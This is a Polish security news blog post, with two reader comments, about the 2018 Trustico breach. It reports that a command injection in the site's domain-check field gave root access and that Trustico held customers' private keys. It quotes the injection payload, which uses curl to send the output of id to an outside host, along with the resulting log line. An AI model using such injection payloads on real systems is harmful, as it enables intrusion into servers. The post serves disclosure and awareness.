23 000 certyfikatów SSL do wyrzutki. Mieli serwis odpalony na roocie + banalne wstrzyknięcie

04 marca 2018, 17:39 | W biegu | komentarze 2
Tagi: , ,
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. "pechowemu" Equifax. Jak wyglądał exploit dający roota? Banalnie - w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`)

Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root:

35.190.140.214 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Nasi czytelnicy raczej się nie nabiorą nigdy na hasło Trustico (i podobnych firm) "Buy SSL Certificates & Secure Your Website", bo jak widać zakup certyfikatu SSL nie czyni automatycznie serwisu "bezpiecznym" :P

Na domiar złego Trustico przyznało się też do posiadania wszystkich kluczy prywatnych do wygenerowanych przez siebie certyfikatów, co jest kolejną rzeczą, która absolutnie nie powinna mieć miejsca...

--ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Michał

    Kwestia do sprostowania - mieli klucze tylko do certyfikatów, które ktoś u nich generował na stronie. Jak dostarczyłeś własny CSR to nie było oczywiście problemu. Zreszta nie wiem kto mógł pomysleć, ze to dobry pomysł w ogóle ;)

    Odpowiedz
  2. lebosco

    Dziękuję i życzę smacznego dnia !

    Odpowiedz

Odpowiedz